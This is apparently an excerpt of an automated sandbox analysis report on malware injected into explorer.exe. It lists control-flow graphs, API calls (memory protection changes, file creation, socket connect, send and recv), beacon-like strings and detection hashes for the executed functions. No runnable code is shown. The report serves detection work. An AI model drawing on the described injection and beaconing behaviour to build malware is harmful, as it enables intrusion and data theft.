e4dc28a 13858->13859 13860 e4d88f2 NtProtectVirtualMemory 13859->13860 13863 e4dc2a9 13860->13863 13861 e4dc2cd 13862 e4df382 ObtainUserAgentString 13861->13862 13862->13856 13863->13861 13864 e4d88f2 NtProtectVirtualMemory 13863->13864 13864->13861 13901 e4e00b9 13902 e4e00ed 13901->13902 13904 e4e01f0 13901->13904 13903 e4e3f82 6 API calls 13902->13903 13902->13904 13903->13904 13865 e4dc2f4 13866 e4dc349 13865->13866 13867 e4dc49f 13866->13867 13869 e4d88f2 NtProtectVirtualMemory 13866->13869 13868 e4d88f2 NtProtectVirtualMemory 13867->13868 13872 e4dc4c3 13867->13872 13868->13872 13870 e4dc480 13869->13870 13871 e4d88f2 NtProtectVirtualMemory 13870->13871 13871->13867 13873 e4d88f2 NtProtectVirtualMemory 13872->13873 13874 e4dc597 13872->13874 13873->13874 13875 e4d88f2 NtProtectVirtualMemory 13874->13875 13877 e4dc5bf 13874->13877 13875->13877 13876 e4dc6e1 13878 e4df382 ObtainUserAgentString 13876->13878 13879 e4d88f2 NtProtectVirtualMemory 13877->13879 13880 e4dc6b9 13877->13880 13881 e4dc6e9 13878->13881 13879->13880 13880->13876 13882 e4d88f2 NtProtectVirtualMemory 13880->13882 13882->13876 13738 e4e3232 13740 e4e325c 13738->13740 13741 e4e3334 13738->13741 13739 e4e3410 NtCreateFile 13739->13741 13740->13739 13740->13741 13883 e4d80f1 13884 e4d81d3 13883->13884 13885 e4d8109 13883->13885 13886 e4d8012 6 API calls 13885->13886 13887 e4d8113 13886->13887 13887->13884 13888 e4e3f82 6 API calls 13887->13888 13888->13884 13948 e4d95f1 13949 e4d960e 13948->13949 13950 e4d9606 13948->13950 13951 e4de662 6 API calls 13950->13951 13951->13949 13972 e4e59b3 13973 e4e59bd 13972->13973 13976 e4da6d2 13973->13976 13975 e4e59e0 13977 e4da704 13976->13977 13978 e4da6f7 13976->13978 13980 e4da6ff 13977->13980 13981 e4da72d 13977->13981 13983 e4da737 13977->13983 13979 e4d80f2 6 API calls 13978->13979 13979->13980 13980->13975 13985 e4e02c2 13981->13985 13983->13980 13984 e4e3f82 6 API calls 13983->13984 13984->13980 13986 e4e02df 13985->13986 13987 e4e02cb 13985->13987 13986->13980 13987->13986 13988 e4e00c2 6 API calls 13987->13988 13988->13986 13952 e4e59f1 13953 e4e59f7 13952->13953 13956 e4da852 13953->13956 13955 e4e5a0f 13957 e4da865 13956->13957 13958 e4da8e4 13956->13958 13957->13958 13960 e4da887 13957->13960 13962 e4da87e 13957->13962 13958->13955 13959 e4e036f 13959->13955 13960->13958 13961 e4de662 6 API calls 13960->13961 13961->13958 13962->13959 13963 e4e00c2 6 API calls 13962->13963 13963->13959

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 0E4E3F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 e4e3f82-e4e3fb6 1 e4e3fb8-e4e3fbc 0->1 2 e4e3fd6-e4e3fd9 0->2 1->2 5 e4e3fbe-e4e3fc2 1->5 3 e4e48fe-e4e490c 2->3 4 e4e3fdf-e4e3fed 2->4 6 e4e48f6-e4e48f7 4->6 7 e4e3ff3-e4e3ff7 4->7 5->2 8 e4e3fc4-e4e3fc8 5->8 6->3 9 e4e3fff-e4e4000 7->9 10 e4e3ff9-e4e3ffd 7->10 8->2 11 e4e3fca-e4e3fce 8->11 13 e4e400a-e4e4010 9->13 10->9 10->13 11->2 12 e4e3fd0-e4e3fd4 11->12 12->2 12->4 14 e4e403a-e4e4060 13->14 15 e4e4012-e4e4020 13->15 17 e4e4068-e4e407c call e4e05b2 14->17 18 e4e4062-e4e4066 14->18 15->14 16 e4e4022-e4e4026 15->16 16->6 19 e4e402c-e4e4035 16->19 24 e4e4081-e4e40a2 17->24 18->17 20 e4e40a8-e4e40ab 18->20 19->6 22 e4e4144-e4e4150 20->22 23 e4e40b1-e4e40b8 20->23 27 e4e48ee-e4e48ef 22->27 28 e4e4156-e4e4165 22->28 25 e4e40ba-e4e40dc call e4e3942 23->25 26 e4e40e2-e4e40f5 23->26 24->20 24->27 25->26 26->27 30 e4e40fb-e4e4101 26->30 27->6 31 e4e417f-e4e418f 28->31 32 e4e4167-e4e4178 call e4e0552 28->32 30->27 36 e4e4107-e4e4109 30->36 33 e4e41e5-e4e421b 31->33 34 e4e4191-e4e41ad call e4e0732 31->34 32->31 39 e4e422d-e4e4231 33->39 40 e4e421d-e4e422b 33->40 43 e4e41b2-e4e41da 34->43 36->27 41 e4e410f-e4e4111 36->41 45 e4e4247-e4e424b 39->45 46 e4e4233-e4e4245 39->46 44 e4e427f-e4e4280 40->44 41->27 47 e4e4117-e4e4132 getaddrinfo 41->47 43->33 48 e4e41dc-e4e41e1 43->48 52 e4e4283-e4e42e0 call e4e4d62 call e4e1482 call e4e0e72 call e4e5002 44->52 49 e4e424d-e4e425f 45->49 50 e4e4261-e4e4265 45->50 46->44 47->22 51 e4e4134-e4e413c 47->51 48->33 49->44 53 e4e426d-e4e4279 50->53 54 e4e4267-e4e426b 50->54 51->22 63 e4e42f4-e4e4354 call e4e4d92 52->63 64 e4e42e2-e4e42e6 52->64 53->44 54->52 54->53 69 e4e448c-e4e44b8 call e4e4d62 call e4e5262 63->69 70 e4e435a-e4e4396 call e4e4d62 call e4e5262 call e4e5002 63->70 64->63 65 e4e42e8-e4e42ef call e4e1042 64->65 65->63 79 e4e44ba-e4e44d5 69->79 80 e4e44d9-e4e4590 call e4e5262 * 3 call e4e5002 * 2 call e4e1482 69->80 85 e4e43bb-e4e43e9 call e4e5262 * 2 70->85 86 e4e4398-e4e43b7 call e4e5262 call e4e5002 70->86 79->80 111 e4e4595-e4e45b9 call e4e5262 80->111 101 e4e43eb-e4e4410 call e4e5002 call e4e5262 85->101 102 e4e4415-e4e441d 85->102 86->85 101->102 103 e4e441f-e4e4425 102->103 104 e4e4442-e4e4448 102->104 108 e4e4467-e4e4487 call e4e5262 103->108 109 e4e4427-e4e443d 103->109 110 e4e444e-e4e4456 104->110 104->111 108->111 109->111 110->111 115 e4e445c-e4e445d 110->115 120 e4e45bb-e4e45cc call e4e5262 call e4e5002 111->120 121 e4e45d1-e4e46ad call e4e5262 * 7 call e4e5002 call e4e4d62 call e4e5002 call e4e0e72 call e4e1042 111->121 115->108 132 e4e46af-e4e46b3 120->132 121->132 134 e4e46ff-e4e472d call e4e06b2 132->134 135 e4e46b5-e4e46fa call e4e0382 call e4e07b2 132->135 145 e4e472f-e4e4735 134->145 146 e4e475d-e4e4761 134->146 155 e4e48e6-e4e48e7 135->155 145->146 151 e4e4737-e4e474c 145->151 147 e4e490d-e4e4913 146->147 148 e4e4767-e4e476b 146->148 157 e4e4779-e4e4784 147->157 158 e4e4919-e4e4920 147->158 152 e4e48aa-e4e48df call e4e07b2 148->152 153 e4e4771-e4e4773 148->153 151->146 156 e4e474e-e4e4754 151->156 152->155 153->152 153->157 155->27 156->146 163 e4e4756 156->163 159 e4e4786-e4e4793 157->159 160 e4e4795-e4e4796 157->160 158->159 159->160 164 e4e479c-e4e47a0 159->164 160->164 163->146 167 e4e47a2-e4e47af 164->167 168 e4e47b1-e4e47b2 164->168 167->168 170 e4e47b8-e4e47c4 167->170 168->170 173 e4e47c6-e4e47ef call e4e4d92 call e4e4d62 170->173 174 e4e47f4-e4e4861 setsockopt recv 170->174 173->174 177 e4e48a3-e4e48a4 174->177 178 e4e4863 174->178 177->152 178->177 179 e4e4865-e4e486a 178->179 179->177 182 e4e486c-e4e4872 179->182 182->177 185 e4e4874-e4e48a1 182->185 185->177 185->178
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                            • API String ID: 1564272048-1117930895
                                                                                                                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                            • Instruction ID: 98fb2c7abf5ae99f67f7f191fe9be5d431686edaf0e6563e02800daaf30c5ce7
                                                                                                                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D52BE30618A088BCB29EF68C4947EAB7E1FB54305F504A6FC4AFC7746DE74A945CB81
                                                                                                                                                                            Function 0E4E3232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 303 e4e3232-e4e3256 304 e4e325c-e4e3260 303->304 305 e4e38bd-e4e38cd 303->305 304->305 306 e4e3266-e4e32a0 304->306 307 e4e32bf 306->307 308 e4e32a2-e4e32a6 306->308 310 e4e32c6 307->310 308->307 309 e4e32a8-e4e32ac 308->309 311 e4e32ae-e4e32b2 309->311 312 e4e32b4-e4e32b8 309->312 313 e4e32cb-e4e32cf 310->313 311->310 312->313 314 e4e32ba-e4e32bd 312->314 315 e4e32f9-e4e330b 313->315 316 e4e32d1-e4e32f7 call e4e3942 313->316 314->313 320 e4e3378 315->320 321 e4e330d-e4e3332 315->321 316->315 316->320 322 e4e337a-e4e33a0 320->322 323 e4e3334-e4e333b 321->323 324 e4e33a1-e4e33a8 321->324 325 e4e333d-e4e3360 call e4e3942 323->325 326 e4e3366-e4e3370 323->326 327 e4e33aa-e4e33d3 call e4e3942 324->327 328 e4e33d5-e4e33dc 324->328 325->326 326->320 330 e4e3372-e4e3373 326->330 327->320 327->328 332 e4e33de-e4e340a call e4e3942 328->332 333 e4e3410-e4e3458 NtCreateFile call e4e3172 328->333 330->320 332->320 332->333 338 e4e345d-e4e345f 333->338 338->320 340 e4e3465-e4e346d 338->340 340->320 341 e4e3473-e4e3476 340->341 342 e4e3478-e4e3481 341->342 343 e4e3486-e4e348d 341->343 342->322 344 e4e348f-e4e34b8 call e4e3942 343->344 345 e4e34c2-e4e34ec 343->345 344->320 352 e4e34be-e4e34bf 344->352 350 e4e38ae-e4e38b8 345->350 351 e4e34f2-e4e34f5 345->351 350->320 353 e4e34fb-e4e34fe 351->353 354 e4e3604-e4e3611 351->354 352->345 355 e4e355e-e4e3561 353->355 356 e4e3500-e4e3507 353->356 354->322 361 e4e3616-e4e3619 355->361 362 e4e3567-e4e3572 355->362 358 e4e3538-e4e3559 356->358 359 e4e3509-e4e3532 call e4e3942 356->359 366 e4e35e9-e4e35fa 358->366 359->320 359->358 364 e4e361f-e4e3626 361->364 365 e4e36b8-e4e36bb 361->365 367 e4e3574-e4e359d call e4e3942 362->367 368 e4e35a3-e4e35a6 362->368 372 e4e3628-e4e3651 call e4e3942 364->372 373 e4e3657-e4e366b call e4e4e92 364->373 369 e4e36bd-e4e36c4 365->369 370 e4e3739-e4e373c 365->370 366->354 367->320 367->368 368->320 375 e4e35ac-e4e35b6 368->375 376 e4e36c6-e4e36ef call e4e3942 369->376 377 e4e36f5-e4e3734 369->377 379 e4e37c4-e4e37c7 370->379 380 e4e3742-e4e3749 370->380 372->320 372->373 373->320 395 e4e3671-e4e36b3 373->395 375->320 383 e4e35bc-e4e35e6 375->383 376->350 376->377 400 e4e3894-e4e38a9 377->400 379->320 384 e4e37cd-e4e37d4 379->384 387 e4e377a-e4e37bf 380->387 388 e4e374b-e4e3774 call e4e3942 380->388 383->366 390 e4e37fc-e4e3803 384->390 391 e4e37d6-e4e37f6 call e4e3942 384->391 387->400 388->350 388->387 398 e4e382b-e4e3835 390->398 399 e4e3805-e4e3825 call e4e3942 390->399 391->390 395->322 398->350 404 e4e3837-e4e383e 398->404 399->398 400->322 404->350 408 e4e3840-e4e3886 404->408 408->400
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID: `
                                                                                                                                                                            • API String ID: 823142352-2679148245
                                                                                                                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                            • Instruction ID: f74f88d546928ebd3b295b0de1dbfc4e88ce8153458df6a3fa20a1c108181d6c
                                                                                                                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E220970A18A099FCB5ADF68C4956AEF7E1FB98302F40462FE45ED7750DB30A851CB81
                                                                                                                                                                            Function 0E4E4E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 447 e4e4e12-e4e4e38 448 e4e4e45-e4e4e6e NtProtectVirtualMemory 447->448 449 e4e4e40 call e4e3942 447->449 450 e4e4e7d-e4e4e8f 448->450 451 e4e4e70-e4e4e7c 448->451 449->448
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0E4E4E67
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                            • Instruction ID: 97b8c2225c83d1a4ed9fab4e1f8f4d895258adbb6f0541d62723eb5efbaba733
                                                                                                                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                            • Instruction Fuzzy Hash: CC019E30628B484F8B88EF6C948422AB7E4FBD9215F000B3EE99AC3250EB60C9414742
                                                                                                                                                                            Function 0E4E4E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 452 e4e4e0a-e4e4e6e call e4e3942 NtProtectVirtualMemory 455 e4e4e7d-e4e4e8f 452->455 456 e4e4e70-e4e4e7c 452->456
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL ref: 0E4E4E67
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2706961497-0
                                                                                                                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                            • Instruction ID: 2cd02c88e783746e88674e0e464086fbb92a6cca9c9c26bdeabb523e3fab4f39
                                                                                                                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                            • Instruction Fuzzy Hash: 8601A234628B884B8B48EF2C94452A6B3E5FBCE315F000B3FE9DAC3240DB21D9024782
                                                                                                                                                                            Function 0E4DE8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • ObtainUserAgentString.URLMON ref: 0E4DE9A0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AgentObtainStringUser
                                                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                            • API String ID: 2681117516-319646191
                                                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                            • Instruction ID: e8a70c2ba7d19d15aa365a8ab9076abd8080e90c6e35647bc53fd27f3a71685c
                                                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E31C031614A0D8BCB44EFA9C8847EEB7E0FB58209F40066FE45ED7340DE788A458789
                                                                                                                                                                            Function 0E4DE8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • ObtainUserAgentString.URLMON ref: 0E4DE9A0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AgentObtainStringUser
                                                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                            • API String ID: 2681117516-319646191
                                                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                            • Instruction ID: 4509b7cc57895cac662d6ff27909d968995760343b15e8740b2ba1a015ae388d
                                                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                            • Instruction Fuzzy Hash: EF21C370A14A0D8BCB45EFA9C8947EE7BE1FF58209F40465FE45AD7340DF788A058789
                                                                                                                                                                            Function 0E4DAB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 232 e4dab66-e4dab68 233 e4dab6a-e4dab6b 232->233 234 e4dab93-e4dabb8 232->234 236 e4dab6d-e4dab71 233->236 237 e4dabbe-e4dac22 call e4e1612 call e4e3942 * 2 233->237 235 e4dabbb-e4dabbc 234->235 235->237 236->235 238 e4dab73-e4dab92 236->238 246 e4dacdc 237->246 247 e4dac28-e4dac2b 237->247 238->234 249 e4dacde-e4dacf6 246->249 247->246 248 e4dac31-e4dacb0 call e4e5da4 call e4e5022 call e4e53e2 call e4e5022 call e4e53e2 247->248 261 e4dacb5-e4dacca CreateMutexExW 248->261 262 e4dacce-e4dacd3 261->262 262->246 263 e4dacd5-e4dacda 262->263 263->249
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                            • String ID: .dll$el32$kern
                                                                                                                                                                            • API String ID: 1964310414-1222553051
                                                                                                                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                            • Instruction ID: bf66ac992f51cb8899f6df96edbb0dfee2c065b1eb03078283176992237799c0
                                                                                                                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 59416B70918A088FDB54EFA8C8D8BAD77E0FB98301F04467BD84EDB255DE349945CB85
                                                                                                                                                                            Function 0E4DAB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                            • String ID: .dll$el32$kern
                                                                                                                                                                            • API String ID: 1964310414-1222553051
                                                                                                                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                            • Instruction ID: 008c89b5f2e869da88f7d7206e11747ebd42296ba0ff777ed1ac2363f9eafb74
                                                                                                                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                            • Instruction Fuzzy Hash: 68414970918A088FDB94EFA8C498BAD77F0FB68301F04457BD84EDB256DE349945CB85
                                                                                                                                                                            Function 0E4E072E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 293 e4e072e-e4e0768 294 e4e076a-e4e0782 call e4e3942 293->294 295 e4e0788-e4e07ab connect 293->295 294->295
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: connect
                                                                                                                                                                            • String ID: conn$ect
                                                                                                                                                                            • API String ID: 1959786783-716201944
                                                                                                                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                            • Instruction ID: c462da55f8737395a0625b5b7c75b655562a90e410136c0bb1d35016a8adcc67
                                                                                                                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C014C30618B188FCB94EF1CE088B55B7E0EB58315F1545AE990DCB226C674C8818BC2
                                                                                                                                                                            Function 0E4E0732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 298 e4e0732-e4e0768 299 e4e076a-e4e0782 call e4e3942 298->299 300 e4e0788-e4e07ab connect 298->300 299->300
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: connect
                                                                                                                                                                            • String ID: conn$ect
                                                                                                                                                                            • API String ID: 1959786783-716201944
                                                                                                                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                            • Instruction ID: 028ac7b1c1350ef4ea5880095ffb3be9ee59b9f25f5e4ee2be7feeecbd6a385b
                                                                                                                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                            • Instruction Fuzzy Hash: C3011A70618A1C8FCB94EF5CA088B55B7E0EB59315F1545AEA80DCB226CAB4C9818BC2
                                                                                                                                                                            Function 0E4E06B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 411 e4e06b2-e4e06e5 412 e4e06e7-e4e06ff call e4e3942 411->412 413 e4e0705-e4e072d send 411->413 412->413
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: send
                                                                                                                                                                            • String ID: send
                                                                                                                                                                            • API String ID: 2809346765-2809346765
                                                                                                                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                            • Instruction ID: c088726c8e762263e7069f143a305912e5cd646d0e04a7a792db0bf33f2797d7
                                                                                                                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                            • Instruction Fuzzy Hash: B7011270518A188FDB84EF5CD088B2577E0EB58315F1546AED85DCB366C670D8818B81
                                                                                                                                                                            Function 0E4E05B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 416 e4e05b2-e4e05ea 417 e4e05ec-e4e0604 call e4e3942 416->417 418 e4e060a-e4e062b socket 416->418 417->418
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.4142928612.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e4a0000_explorer.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: socket
                                                                                                                                                                            • String ID: sock
                                                                                                                                                                            • API String ID: 98920635-2415254727
                                                                                                                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                            • Instruction ID: 52407786c8e33191170161cee7566cb56ab13d170b49ca7d68d333f477a1a1dc
                                                                                                                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                            • Instruction Fuzzy Hash: D30121706186188FCB84EF1CD048B55BBE0FB59315F1545AED45ECB366C7B0C9818B86
                                                                                                                                                                            Function 0E4D82DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
